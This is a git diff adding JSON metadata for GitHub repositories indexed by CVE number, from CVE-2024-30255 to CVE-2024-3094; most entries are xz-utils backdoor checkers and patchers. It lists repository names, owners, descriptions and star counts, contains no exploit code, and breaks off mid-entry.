+ "owner": { + "login": "blackmagic2023", + "id": 149164084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149164084?v=4", + "html_url": "https:\/\/github.com\/blackmagic2023", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blackmagic2023\/Envoy-CPU-Exhaustion-Vulnerability-PoC", + "description": "CVE-2024-30255 This repository contains a proof-of-concept (PoC) Python script to demonstrate the CPU exhaustion vulnerability in Envoy caused by a flood of CONTINUATION frames.", + "fork": false, + "created_at": "2024-04-09T15:59:50Z", + "updated_at": "2024-04-17T06:01:02Z", + "pushed_at": "2024-04-09T16:04:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30270.json b/2024/CVE-2024-30270.json new file mode 100644 index 0000000000..4670d4ac52 --- /dev/null +++ b/2024/CVE-2024-30270.json @@ -0,0 +1,33 @@ +[ + { + "id": 818090111, + "name": "CVE-2024-30270-PoC", + "full_name": "Alchemist3dot14\/CVE-2024-30270-PoC", + "owner": { + "login": "Alchemist3dot14", + "id": 63059909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63059909?v=4", + "html_url": "https:\/\/github.com\/Alchemist3dot14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alchemist3dot14\/CVE-2024-30270-PoC", + "description": "The script exploits Mailcow vulnerabilities via XSS and RCE, emphasizing the need for robust security measures and responsible usage to enhance web application security.", + "fork": false, + "created_at": "2024-06-21T04:47:48Z", + "updated_at": "2024-09-18T04:21:32Z", + "pushed_at": "2024-06-21T13:00:06Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30491.json b/2024/CVE-2024-30491.json new file mode 100644 index 0000000000..f26723d571 --- /dev/null +++ b/2024/CVE-2024-30491.json @@ -0,0 +1,33 @@ +[ + { + "id": 795962526, + "name": "CVE-2024-30491-Poc", + "full_name": "truonghuuphuc\/CVE-2024-30491-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-30491-Poc", + "description": "CVE-2024-30491 ProfileGrid <= 5.7.8 - Authenticated (Subscriber+) SQL Injection", + "fork": false, + "created_at": "2024-05-04T14:22:15Z", + "updated_at": "2024-06-26T12:03:51Z", + "pushed_at": "2024-05-04T18:36:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30614.json b/2024/CVE-2024-30614.json new file mode 100644 index 0000000000..518d3bc4eb --- /dev/null +++ b/2024/CVE-2024-30614.json @@ -0,0 +1,33 @@ +[ + { + "id": 782855972, + "name": "CVE-2024-30614", + "full_name": "Lucky-lm\/CVE-2024-30614", + "owner": { + "login": "Lucky-lm", + "id": 104305063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104305063?v=4", + "html_url": "https:\/\/github.com\/Lucky-lm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lucky-lm\/CVE-2024-30614", + "description": null, + "fork": false, + "created_at": "2024-04-06T08:26:04Z", + "updated_at": "2024-04-06T08:26:04Z", + "pushed_at": "2024-04-06T08:26:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30656.json b/2024/CVE-2024-30656.json new file mode 100644 index 0000000000..1652da16c8 --- /dev/null +++ b/2024/CVE-2024-30656.json @@ -0,0 +1,42 @@ +[ + { + "id": 783836651, + "name": "Firebolt-wristphone-vulnerability", + "full_name": "Yashodhanvivek\/Firebolt-wristphone-vulnerability", + "owner": { + "login": "Yashodhanvivek", + "id": 5335615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5335615?v=4", + "html_url": "https:\/\/github.com\/Yashodhanvivek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yashodhanvivek\/Firebolt-wristphone-vulnerability", + "description": "This repository is for Firebolt wristphone vulnerability for CVE ID CVE-2024-30656 suggested by MITRE. Mitre yet to confirm on ID", + "fork": false, + "created_at": "2024-04-08T17:05:39Z", + "updated_at": "2024-04-09T14:45:57Z", + "pushed_at": "2024-04-18T09:41:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "firebolt", + "vulnerability", + "wifi-deauth", + "wifi-deauther", + "wifi-hacking", + "wifi-security", + "wristphone" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30850.json b/2024/CVE-2024-30850.json new file mode 100644 index 0000000000..443d8ad137 --- /dev/null +++ b/2024/CVE-2024-30850.json @@ -0,0 +1,33 @@ +[ + { + "id": 782713509, + "name": "CVE-2024-30850-chaos-rat-rce-poc", + "full_name": "chebuya\/CVE-2024-30850-chaos-rat-rce-poc", + "owner": { + "login": "chebuya", + "id": 146861503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4", + "html_url": "https:\/\/github.com\/chebuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chebuya\/CVE-2024-30850-chaos-rat-rce-poc", + "description": "CHAOS RAT web panel path RCE PoC", + "fork": false, + "created_at": "2024-04-05T21:35:04Z", + "updated_at": "2024-12-22T01:39:36Z", + "pushed_at": "2024-04-15T17:46:32Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30851.json b/2024/CVE-2024-30851.json new file mode 100644 index 0000000000..2f824c5ec0 --- /dev/null +++ b/2024/CVE-2024-30851.json @@ -0,0 +1,33 @@ +[ + { + "id": 782242240, + "name": "CVE-2024-30851-jasmin-ransomware-path-traversal-poc", + "full_name": "chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc", + "owner": { + "login": "chebuya", + "id": 146861503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4", + "html_url": "https:\/\/github.com\/chebuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc", + "description": "Jasmin ransomware web panel path traversal PoC", + "fork": false, + "created_at": "2024-04-04T22:59:55Z", + "updated_at": "2024-12-06T09:40:39Z", + "pushed_at": "2024-04-09T03:40:52Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30875.json b/2024/CVE-2024-30875.json new file mode 100644 index 0000000000..50e526d9c5 --- /dev/null +++ b/2024/CVE-2024-30875.json @@ -0,0 +1,33 @@ +[ + { + "id": 851480447, + "name": "CVE-2024-30875", + "full_name": "Ant1sec-ops\/CVE-2024-30875", + "owner": { + "login": "Ant1sec-ops", + "id": 98224710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98224710?v=4", + "html_url": "https:\/\/github.com\/Ant1sec-ops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ant1sec-ops\/CVE-2024-30875", + "description": "Reflected Cross Site Scripting - RXSS", + "fork": false, + "created_at": "2024-09-03T07:11:08Z", + "updated_at": "2024-09-04T13:09:20Z", + "pushed_at": "2024-09-04T13:09:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30896.json b/2024/CVE-2024-30896.json new file mode 100644 index 0000000000..9d4834f7a5 --- /dev/null +++ b/2024/CVE-2024-30896.json @@ -0,0 +1,33 @@ +[ + { + "id": 776087071, + "name": "CVE-2024-30896", + "full_name": "XenoM0rph97\/CVE-2024-30896", + "owner": { + "login": "XenoM0rph97", + "id": 44051481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44051481?v=4", + "html_url": "https:\/\/github.com\/XenoM0rph97", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XenoM0rph97\/CVE-2024-30896", + "description": null, + "fork": false, + "created_at": "2024-03-22T16:50:40Z", + "updated_at": "2024-11-27T16:49:55Z", + "pushed_at": "2024-11-20T23:58:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3094.json b/2024/CVE-2024-3094.json new file mode 100644 index 0000000000..8f7ce98aa3 --- /dev/null +++ b/2024/CVE-2024-3094.json @@ -0,0 +1,1875 @@ +[ + { + "id": 779364261, + "name": "CVE-2024-3094-info", + "full_name": "byinarie\/CVE-2024-3094-info", + "owner": { + "login": "byinarie", + "id": 20119926, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20119926?v=4", + "html_url": "https:\/\/github.com\/byinarie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byinarie\/CVE-2024-3094-info", + "description": "Information for CVE-2024-3094", + "fork": false, + "created_at": "2024-03-29T17:03:01Z", + "updated_at": "2025-01-07T05:03:30Z", + "pushed_at": "2024-04-01T16:01:34Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 52, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 779430633, + "name": "CVE-2024-3094-checker", + "full_name": "FabioBaroni\/CVE-2024-3094-checker", + "owner": { + "login": "FabioBaroni", + "id": 2703045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2703045?v=4", + "html_url": "https:\/\/github.com\/FabioBaroni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FabioBaroni\/CVE-2024-3094-checker", + "description": "Quick and dirty PoC for checking whether a vulnerable version of xz-utils is installed (CVE-2024-3094)", + "fork": false, + "created_at": "2024-03-29T20:28:17Z", + "updated_at": "2024-10-25T10:55:56Z", + "pushed_at": "2024-03-31T00:13:39Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 73, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 779437270, + "name": "CVE-2024-3094-Vulnerabity-Checker", + "full_name": "lypd0\/CVE-2024-3094-Vulnerabity-Checker", + "owner": { + "login": "lypd0", + "id": 146327014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146327014?v=4", + "html_url": "https:\/\/github.com\/lypd0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lypd0\/CVE-2024-3094-Vulnerabity-Checker", + "description": "Verify that your XZ Utils version is not vulnerable to CVE-2024-3094", + "fork": false, + "created_at": "2024-03-29T20:52:27Z", + "updated_at": "2024-05-03T02:31:49Z", + "pushed_at": "2024-03-29T21:56:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "check", + "checker", + "cve-2024-3094", + "exploit", + "scanner", + "script", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779449882, + "name": "xz_utils-CVE-2024-3094", + "full_name": "OpensourceICTSolutions\/xz_utils-CVE-2024-3094", + "owner": { + "login": "OpensourceICTSolutions", + "id": 68592870, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68592870?v=4", + "html_url": "https:\/\/github.com\/OpensourceICTSolutions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpensourceICTSolutions\/xz_utils-CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-03-29T21:41:42Z", + "updated_at": "2024-03-29T21:41:42Z", + "pushed_at": "2024-03-29T21:42:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 779473804, + "name": "xz_cve-2024-3094_detection", + "full_name": "bioless\/xz_cve-2024-3094_detection", + "owner": { + "login": "bioless", + "id": 10271875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10271875?v=4", + "html_url": "https:\/\/github.com\/bioless", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bioless\/xz_cve-2024-3094_detection", + "description": "Script to detect CVE-2024-3094.", + "fork": false, + "created_at": "2024-03-29T23:20:22Z", + "updated_at": "2024-03-29T23:23:15Z", + "pushed_at": "2024-03-29T23:23:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779474128, + "name": "CVE-2024-3094_xz_check", + "full_name": "Hacker-Hermanos\/CVE-2024-3094_xz_check", + "owner": { + "login": "Hacker-Hermanos", + "id": 152432195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152432195?v=4", + "html_url": "https:\/\/github.com\/Hacker-Hermanos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hacker-Hermanos\/CVE-2024-3094_xz_check", + "description": "This repository contains a Bash script and a one-liner command to verify if a system is running a vulnerable version of the \"xz\" utility, as specified by CVE-2024-3094.", + "fork": false, + "created_at": "2024-03-29T23:21:44Z", + "updated_at": "2024-04-07T21:38:02Z", + "pushed_at": "2024-03-30T05:21:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 779476965, + "name": "CVE-2024-3094", + "full_name": "Fractal-Tess\/CVE-2024-3094", + "owner": { + "login": "Fractal-Tess", + "id": 75957529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75957529?v=4", + "html_url": "https:\/\/github.com\/Fractal-Tess", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fractal-Tess\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-03-29T23:36:07Z", + "updated_at": "2024-03-29T23:36:13Z", + "pushed_at": "2024-03-30T00:34:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 779576477, + "name": "CVE-2024-3094-check", + "full_name": "wgetnz\/CVE-2024-3094-check", + "owner": { + "login": "wgetnz", + "id": 62410571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62410571?v=4", + "html_url": "https:\/\/github.com\/wgetnz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wgetnz\/CVE-2024-3094-check", + "description": null, + "fork": false, + "created_at": "2024-03-30T07:38:39Z", + "updated_at": "2024-04-07T11:15:50Z", + "pushed_at": "2024-03-30T08:08:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779626345, + "name": "xz-backdoor-github", + "full_name": "emirkmo\/xz-backdoor-github", + "owner": { + "login": "emirkmo", + "id": 11209690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11209690?v=4", + "html_url": "https:\/\/github.com\/emirkmo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emirkmo\/xz-backdoor-github", + "description": "History of commits related to the xz backdoor Discovered On March 29, 2024: CVE-2024-3094.", + "fork": false, + "created_at": "2024-03-30T10:48:54Z", + "updated_at": "2024-05-15T20:20:03Z", + "pushed_at": "2024-04-01T15:12:50Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779717708, + "name": "CVE-2024-3094", + "full_name": "ashwani95\/CVE-2024-3094", + "owner": { + "login": "ashwani95", + "id": 36373739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36373739?v=4", + "html_url": "https:\/\/github.com\/ashwani95", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ashwani95\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-03-30T15:29:05Z", + "updated_at": "2024-03-30T15:29:38Z", + "pushed_at": "2024-03-30T17:00:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779734707, + "name": "xz-utils-vuln-checker", + "full_name": "harekrishnarai\/xz-utils-vuln-checker", + "owner": { + "login": "harekrishnarai", + "id": 63994966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63994966?v=4", + "html_url": "https:\/\/github.com\/harekrishnarai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/harekrishnarai\/xz-utils-vuln-checker", + "description": "Checker for CVE-2024-3094 where malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code.", + "fork": false, + "created_at": "2024-03-30T16:25:50Z", + "updated_at": "2024-03-30T19:45:26Z", + "pushed_at": "2024-03-30T17:43:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve", + "cve-2024-3094", + "xz", + "xz-utils" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779754842, + "name": "CVE-2024-3094", + "full_name": "teyhouse\/CVE-2024-3094", + "owner": { + "login": "teyhouse", + "id": 828439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/828439?v=4", + "html_url": "https:\/\/github.com\/teyhouse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teyhouse\/CVE-2024-3094", + "description": "K8S and Docker Vulnerability Check for CVE-2024-3094", + "fork": false, + "created_at": "2024-03-30T17:35:49Z", + "updated_at": "2024-04-26T18:17:21Z", + "pushed_at": "2024-03-31T14:36:00Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779783613, + "name": "CVE-2024-3094-Vulnerability-Checker-Fixer", + "full_name": "alokemajumder\/CVE-2024-3094-Vulnerability-Checker-Fixer", + "owner": { + "login": "alokemajumder", + "id": 26596583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26596583?v=4", + "html_url": "https:\/\/github.com\/alokemajumder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alokemajumder\/CVE-2024-3094-Vulnerability-Checker-Fixer", + "description": "Shell scripts to identify and fix installations of xz-utils affected by the CVE-2024-3094 vulnerability. Versions 5.6.0 and 5.6.1 of xz-utils are known to be vulnerable, and this script aids in detecting them and optionally downgrading to a stable, un-compromised version (5.4.6) or upgrading to latest version. Added Ansible Playbook", + "fork": false, + "created_at": "2024-03-30T19:23:30Z", + "updated_at": "2024-08-04T13:52:01Z", + "pushed_at": "2024-04-07T07:40:48Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [ + "ansible", + "ansible-playbook", + "ansible-playbooks", + "cve-2024-3094", + "linux", + "opensource", + "opensource-projects", + "ssh", + "vulnerabilities", + "vulnerability-detection", + "vulnerability-scanners", + "xz", + "xz-compression-utilities", + "xz-files", + "xz-utils" + ], + "visibility": "public", + "forks": 6, + "watchers": 22, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 779793653, + "name": "CVE-2024-3094", + "full_name": "Horizon-Software-Development\/CVE-2024-3094", + "owner": { + "login": "Horizon-Software-Development", + "id": 81176281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81176281?v=4", + "html_url": "https:\/\/github.com\/Horizon-Software-Development", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Horizon-Software-Development\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-03-30T20:05:13Z", + "updated_at": "2024-10-01T15:44:03Z", + "pushed_at": "2024-03-30T20:16:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 779823084, + "name": "CVE-2024-3094-checker", + "full_name": "hazemkya\/CVE-2024-3094-checker", + "owner": { + "login": "hazemkya", + "id": 83143965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83143965?v=4", + "html_url": "https:\/\/github.com\/hazemkya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hazemkya\/CVE-2024-3094-checker", + "description": null, + "fork": false, + "created_at": "2024-03-30T21:56:17Z", + "updated_at": "2024-03-31T00:17:52Z", + "pushed_at": "2024-03-31T00:40:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779825169, + "name": "xz-vulnerable-honeypot", + "full_name": "lockness-Ko\/xz-vulnerable-honeypot", + "owner": { + "login": "lockness-Ko", + "id": 42625905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42625905?v=4", + "html_url": "https:\/\/github.com\/lockness-Ko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lockness-Ko\/xz-vulnerable-honeypot", + "description": "An ssh honeypot with the XZ backdoor. CVE-2024-3094", + "fork": false, + "created_at": "2024-03-30T22:07:24Z", + "updated_at": "2024-12-13T17:05:34Z", + "pushed_at": "2024-04-02T03:38:32Z", + "stargazers_count": 143, + "watchers_count": 143, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "backdoor", + "cve-2024-3094", + "honeypot", + "xz" + ], + "visibility": "public", + "forks": 20, + "watchers": 143, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 779837781, + "name": "CVE-2024-3094-One-Liner", + "full_name": "brinhosa\/CVE-2024-3094-One-Liner", + "owner": { + "login": "brinhosa", + "id": 1003952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1003952?v=4", + "html_url": "https:\/\/github.com\/brinhosa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brinhosa\/CVE-2024-3094-One-Liner", + "description": null, + "fork": false, + "created_at": "2024-03-30T23:16:10Z", + "updated_at": "2024-04-05T03:16:33Z", + "pushed_at": "2024-04-01T12:09:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779897643, + "name": "CVE-2024-3094", + "full_name": "isuruwa\/CVE-2024-3094", + "owner": { + "login": "isuruwa", + "id": 72663288, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72663288?v=4", + "html_url": "https:\/\/github.com\/isuruwa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/isuruwa\/CVE-2024-3094", + "description": "CVE-2024-3094", + "fork": false, + "created_at": "2024-03-31T04:50:09Z", + "updated_at": "2024-03-31T05:32:39Z", + "pushed_at": "2024-03-31T05:31:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3094", + "xz", + "xz-utils" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779977820, + "name": "CVE-2024-3094", + "full_name": "Yuma-Tsushima07\/CVE-2024-3094", + "owner": { + "login": "Yuma-Tsushima07", + "id": 63207324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63207324?v=4", + "html_url": "https:\/\/github.com\/Yuma-Tsushima07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yuma-Tsushima07\/CVE-2024-3094", + "description": "A script to detect if xz is vulnerable - CVE-2024-3094", + "fork": false, + "created_at": "2024-03-31T10:45:44Z", + "updated_at": "2024-04-03T04:33:34Z", + "pushed_at": "2024-03-31T11:02:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779978033, + "name": "cve-2024-3094-tools", + "full_name": "jfrog\/cve-2024-3094-tools", + "owner": { + "login": "jfrog", + "id": 499942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4", + "html_url": "https:\/\/github.com\/jfrog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jfrog\/cve-2024-3094-tools", + "description": null, + "fork": false, + "created_at": "2024-03-31T10:46:33Z", + "updated_at": "2024-12-03T09:26:32Z", + "pushed_at": "2024-04-07T13:07:44Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 38, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 780033593, + "name": "CVE-2024-3094-patcher", + "full_name": "Simplifi-ED\/CVE-2024-3094-patcher", + "owner": { + "login": "Simplifi-ED", + "id": 75945575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75945575?v=4", + "html_url": "https:\/\/github.com\/Simplifi-ED", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Simplifi-ED\/CVE-2024-3094-patcher", + "description": "Ansible playbook for patching CVE-2024-3094", + "fork": false, + "created_at": "2024-03-31T14:09:28Z", + "updated_at": "2024-03-31T14:09:29Z", + "pushed_at": "2024-03-31T15:36:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780105802, + "name": "CVE-2024-3094-Nmap-NSE-script", + "full_name": "gayatriracha\/CVE-2024-3094-Nmap-NSE-script", + "owner": { + "login": "gayatriracha", + "id": 150776676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150776676?v=4", + "html_url": "https:\/\/github.com\/gayatriracha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gayatriracha\/CVE-2024-3094-Nmap-NSE-script", 